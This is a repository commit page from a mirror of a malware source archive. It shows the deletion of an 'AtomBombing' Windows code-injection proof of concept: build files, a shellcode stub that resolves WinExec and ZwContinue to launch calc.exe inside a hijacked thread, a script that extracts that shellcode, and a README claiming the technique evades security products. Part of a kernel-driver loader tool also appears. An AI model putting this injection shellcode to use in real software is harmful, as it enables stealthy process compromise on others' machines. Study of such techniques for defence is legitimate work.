ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

rem

Browse Source 
rem
This commit is contained in:
vxunderground 2022-05-16 06:36:11 -05:00
parent beeaf44c6b
commit d949cd38f0
389 changed files with 0 additions and 147521 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

252
Win32/Proof of Concepts/AtomBombingInjection/.gitignore vendored
View File

@ -1,252 +0,0 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# DNX
project.lock.json
artifacts/
*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Comment the next line if you want to checkin your web deploy settings
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produces more ignoreable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.pfx
*.publishsettings
node_modules/
orleans.codegen.cs
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
*.mdf
*.ldf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml

31
Win32/Proof of Concepts/AtomBombingInjection/AtomBombing.sln
View File

@ -1,31 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.40629.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AtomBombing", "AtomBombing\AtomBombing.vcxproj", "{D303FA55-CFF8-4484-888A-F06B21559014}"
ProjectSection(ProjectDependencies) = postProject
{DAD3D2B2-372F-4486-91FA-032CC0AA1133} = {DAD3D2B2-372F-4486-91FA-032CC0AA1133}
EndProjectSection
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AtomBombingShellcode", "AtomBombingShellcode\AtomBombingShellcode.vcxproj", "{DAD3D2B2-372F-4486-91FA-032CC0AA1133}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D303FA55-CFF8-4484-888A-F06B21559014}.Debug|Win32.ActiveCfg = Release|Win32
{D303FA55-CFF8-4484-888A-F06B21559014}.Debug|Win32.Build.0 = Release|Win32
{D303FA55-CFF8-4484-888A-F06B21559014}.Release|Win32.ActiveCfg = Release|Win32
{D303FA55-CFF8-4484-888A-F06B21559014}.Release|Win32.Build.0 = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Debug|Win32.ActiveCfg = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Debug|Win32.Build.0 = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Release|Win32.ActiveCfg = Release|Win32
{DAD3D2B2-372F-4486-91FA-032CC0AA1133}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

58
Win32/Proof of Concepts/AtomBombingInjection/AtomBombing/AtomBombing.vcxproj
View File

@ -1,58 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{D303FA55-CFF8-4484-888A-F06B21559014}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>AtomBombing</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

22
Win32/Proof of Concepts/AtomBombingInjection/AtomBombing/AtomBombing.vcxproj.filters
View File

@ -1,22 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

1796
Win32/Proof of Concepts/AtomBombingInjection/AtomBombing/main.cpp
View File

File diff suppressed because it is too large Load Diff

61
Win32/Proof of Concepts/AtomBombingInjection/AtomBombingShellcode/AtomBombingShellcode.vcxproj
View File

@ -1,61 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{DAD3D2B2-372F-4486-91FA-032CC0AA1133}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>AtomBombingShellcode</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<MergeSections>
</MergeSections>
</Link>
<PostBuildEvent>
<Command>c:\python27\python.exe "$(SolutionDir)\$(ProjectName)\Scripts\Post_Link.py" "$(SolutionDir)$(Configuration)\$(ProjectName).exe"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

22
Win32/Proof of Concepts/AtomBombingInjection/AtomBombingShellcode/AtomBombingShellcode.vcxproj.filters
View File

@ -1,22 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

31
Win32/Proof of Concepts/AtomBombingInjection/AtomBombingShellcode/Scripts/Post_Link.py
View File

@ -1,31 +0,0 @@
import pefile
import sys
import os
DUMMY_FUNC = "\x55\x8b\xec\x51\xc7\x45\xfc\xbe\xba\xad\xde\x8b\xe5\x5d\xc3"
def main():
exe_path = sys.argv[1]
pe = pefile.PE(exe_path)
print "Starting!"
output = ""
text_section = ""
for section in pe.sections:
if ".text" in section.Name:
print (section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), section.SizeOfRawData )
text_section = pe.get_data(section.VirtualAddress, section.SizeOfRawData)
binary_shellcode = text_section[:text_section.find(DUMMY_FUNC)]
for byte in binary_shellcode:
output += "\\x%x" % ord(byte)
output = "#define SHELLCODE (\"%s\")" % output
folder, file_name = os.path.split(exe_path)
base, _ = os.path.splitext(file_name)
print os.path.join(folder, base+".h")
open(os.path.join(folder, base) + ".h", "wb").write(output)
open(os.path.join(folder, base) + ".text", "wb").write(text_section)
open(os.path.join(folder, base) + ".shellcode", "wb").write(binary_shellcode)
if __name__ == "__main__":
main()

95
Win32/Proof of Concepts/AtomBombingInjection/AtomBombingShellcode/main.c
View File

@ -1,95 +0,0 @@
typedef void * (__stdcall *pfnLoadLibraryA)(void *lpLibFileName);
typedef void * (__stdcall *pfnGetProcAddress)(void * hModule, void * lpProcName);
typedef int(__stdcall *pfnWinExec)(void * lpCmdLine, unsigned int uCmdShow);
typedef int(__stdcall *pfnZwContinue)(void * lpContext, int TestAlert);
typedef struct _FUNCTIONPOINTERS
{
pfnLoadLibraryA pfnLoadLibraryA;
pfnGetProcAddress pfnGetProcAddress;
} FUNCTIONPOINTERS, *PFUNCTIONPOINTERS;
FUNCTIONPOINTERS g_FunctionPointers;
void shellcode_entry();
__declspec(naked) void fix_esp()
{
__asm{
mov eax, edi;
add ax, 0xc4;
mov esp, [eax];
sub sp, 0x1024;
// This is needed for alignment purposes
nop;
nop;
nop;
}
}
void shellcode_entry()
{
PFUNCTIONPOINTERS ptFunctionPointer = 0x13371337;
pfnWinExec pfnWinExec;
pfnZwContinue pfnZwContinue;
void * ptContext;
void * hKernel32;
void * hNtDll;
char pszKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', '\0' };
char pszNtDll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', '\0' };
char pszZwContinue[] = { 'Z','w','C','o','n','t','i','n','u','e', '\0'};
char pszWinExec[] = { 'W', 'i', 'n', 'E', 'x', 'e', 'c', '\0' };
char pszCalcExe[] = { 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', '\0' };
__asm{
mov[ptContext], edi;
}
hKernel32 = ptFunctionPointer->pfnLoadLibraryA(pszKernel32);
if (0 == hKernel32)
{
goto lblCleanup;
}
hNtDll = ptFunctionPointer->pfnLoadLibraryA(pszNtDll);
if (0 == hNtDll)
{
goto lblCleanup;
}
pfnZwContinue = ptFunctionPointer->pfnGetProcAddress(hNtDll, pszZwContinue);
if (0 == pfnZwContinue)
{
goto lblCleanup;
}
pfnWinExec = ptFunctionPointer->pfnGetProcAddress(hKernel32, pszWinExec);
if (0 == pfnWinExec)
{
goto lblCleanup;
}
pfnWinExec(pszCalcExe, 0);
pfnZwContinue(ptContext, 1);
lblCleanup:
return;
}
void dummy()
{
int dummy = 0xDEADBABE;
}
#include <Windows.h>
int main()
{
g_FunctionPointers.pfnGetProcAddress = GetProcAddress;
g_FunctionPointers.pfnLoadLibraryA = LoadLibraryA;
fix_esp();
shellcode_entry();
dummy();
}

2
Win32/Proof of Concepts/AtomBombingInjection/README.md
View File

@ -1,2 +0,0 @@
# atom-bombing
Heres a new code injection technique, dubbed AtomBombing, which exploits Windows atom tables and Async Procedure Calls (APC). Currently, this technique goes undetected by common security solutions that focus on preventing infiltration.

20
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook.sln
View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CheckKernelHook", "CheckKernelHook\CheckKernelHook.vcxproj", "{D49C7CB9-A5C2-4377-A234-7C440407A30E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Debug|Win32.ActiveCfg = Debug|Win32
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Debug|Win32.Build.0 = Debug|Win32
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Release|Win32.ActiveCfg = Release|Win32
{D49C7CB9-A5C2-4377-A234-7C440407A30E}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

114
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/AddService.cpp
View File

@ -1,114 +0,0 @@
#include "AddService.h"
#include "stdafx.h"
#include "CheckKernelHookDlg.h"
#include <Winsvc.h>
#pragma once
BOOL Release(){
// HRSRC res = FindResource(NULL,MAKEINTRESOURCE(IDR_SYS),TEXT("BINARY"));
// if(!res)
// return FALSE;
// HGLOBAL resGlobal = LoadResource(NULL,res);
// if(!resGlobal)
// return FALSE;
// DWORD size=SizeofResource(NULL,res);
// BYTE* ptr=(BYTE*)LockResource(resGlobal);
// if(!ptr)
// return FALSE;
HANDLE hFile=CreateFile(TEXT("ReloadKernel.sys"), GENERIC_WRITE,
0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile==INVALID_HANDLE_VALUE)
return FALSE;
DWORD dw;
// if(!WriteFile(hFile,ptr,size,&dw,NULL)){
// CloseHandle(hFile);
// return FALSE;
// }
CloseHandle(hFile);
return TRUE;
}
BOOL UnloadDrv(TCHAR* DriverName){
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS ss;
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!hSCManager){
return FALSE;
}
hService = OpenService( hSCManager,DriverName,SERVICE_ALL_ACCESS);
if( !hService ) {
CloseServiceHandle(hSCManager);
return FALSE;
}
ControlService(hService, SERVICE_CONTROL_STOP, &ss);
DeleteService(hService);
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
return TRUE;
}
BOOL LoadDrv(TCHAR* DriverName){
TCHAR DrvFullPathName[MAX_PATH];
SC_HANDLE schSCManager;
SC_HANDLE schService;
UnloadDrv(L"CheckKernelHook");
// if(!Release())
// return FALSE;
GetFullPathName(TEXT("CheckKernelHook.sys"), MAX_PATH, DrvFullPathName, NULL);
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!schSCManager)
return FALSE;
schService = CreateService(
schSCManager,DriverName,DriverName,
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL,
DrvFullPathName,
NULL,NULL,NULL,NULL,NULL
);
if (!schService){
if (GetLastError() == ERROR_SERVICE_EXISTS){
schService = OpenService(schSCManager,DriverName,SERVICE_ALL_ACCESS);
if (!schService){
CloseServiceHandle(schSCManager);
return FALSE;
}
}else{
CloseServiceHandle(schSCManager);
return FALSE;
}
}
if (!StartService(schService,0,NULL)){
if ( !(GetLastError()==ERROR_SERVICE_ALREADY_RUNNING ) ){
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
return FALSE;
}
}
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
return TRUE;
}

5
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/AddService.h
View File

@ -1,5 +0,0 @@
#include "stdafx.h"
BOOL Release();
BOOL UnloadDrv(TCHAR* DriverName);
BOOL LoadDrv(TCHAR* DriverName);

BIN
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHook.aps
View File

Binary file not shown.

94
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHook.cpp
View File

@ -1,94 +0,0 @@
// CheckKernelHook.cpp : 定义应用程序的类行为。
//
#include "stdafx.h"
#include "CheckKernelHook.h"
#include "CheckKernelHookDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// CCheckKernelHookApp
BEGIN_MESSAGE_MAP(CCheckKernelHookApp, CWinApp)
ON_COMMAND(ID_HELP, &CWinApp::OnHelp)
END_MESSAGE_MAP()
// CCheckKernelHookApp 构造
CCheckKernelHookApp::CCheckKernelHookApp()
{
// 支持重新启动管理器
m_dwRestartManagerSupportFlags = AFX_RESTART_MANAGER_SUPPORT_RESTART;
// TODO: 在此处添加构造代码,
// 将所有重要的初始化放置在 InitInstance 中
}
// 唯一的一个 CCheckKernelHookApp 对象
CCheckKernelHookApp theApp;
// CCheckKernelHookApp 初始化
BOOL CCheckKernelHookApp::InitInstance()
{
// 如果一个运行在 Windows XP 上的应用程序清单指定要
// 使用 ComCtl32.dll 版本 6 或更高版本来启用可视化方式,
//则需要 InitCommonControlsEx()。否则,将无法创建窗口。
INITCOMMONCONTROLSEX InitCtrls;
InitCtrls.dwSize = sizeof(InitCtrls);
// 将它设置为包括所有要在应用程序中使用的
// 公共控件类。
InitCtrls.dwICC = ICC_WIN95_CLASSES;
InitCommonControlsEx(&InitCtrls);
CWinApp::InitInstance();
AfxEnableControlContainer();
// 创建 shell 管理器,以防对话框包含
// 任何 shell 树视图控件或 shell 列表视图控件。
CShellManager *pShellManager = new CShellManager;
// 标准初始化
// 如果未使用这些功能并希望减小
// 最终可执行文件的大小,则应移除下列
// 不需要的特定初始化例程
// 更改用于存储设置的注册表项
// TODO: 应适当修改该字符串,
// 例如修改为公司或组织名
SetRegistryKey(_T("应用程序向导生成的本地应用程序"));
CCheckKernelHookDlg dlg;
m_pMainWnd = &dlg;
INT_PTR nResponse = dlg.DoModal();
if (nResponse == IDOK)
{
// TODO: 在此放置处理何时用
// “确定”来关闭对话框的代码
}
else if (nResponse == IDCANCEL)
{
// TODO: 在此放置处理何时用
// “取消”来关闭对话框的代码
}
// 删除上面创建的 shell 管理器。
if (pShellManager != NULL)
{
delete pShellManager;
}
// 由于对话框已关闭,所以将返回 FALSE 以便退出应用程序,
// 而不是启动应用程序的消息泵。
return FALSE;
}

32
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHook.h
View File

@ -1,32 +0,0 @@
// CheckKernelHook.h : PROJECT_NAME 应用程序的主头文件
//
#pragma once
#ifndef __AFXWIN_H__
#error "在包含此文件之前包含“stdafx.h”以生成 PCH 文件"
#endif
#include "resource.h" // 主符号
// CCheckKernelHookApp:
// 有关此类的实现,请参阅 CheckKernelHook.cpp
//
class CCheckKernelHookApp : public CWinApp
{
public:
CCheckKernelHookApp();
// 重写
public:
virtual BOOL InitInstance();
// 实现
DECLARE_MESSAGE_MAP()
};
extern CCheckKernelHookApp theApp;

BIN
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHook.rc
View File

Binary file not shown.

129
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHook.vcxproj
View File

@ -1,129 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{D49C7CB9-A5C2-4377-A234-7C440407A30E}</ProjectGuid>
<RootNamespace>CheckKernelHook</RootNamespace>
<Keyword>MFCProj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_WINDOWS;_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<ValidateAllParameters>true</ValidateAllParameters>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</Midl>
<ResourceCompile>
<Culture>0x0804</Culture>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
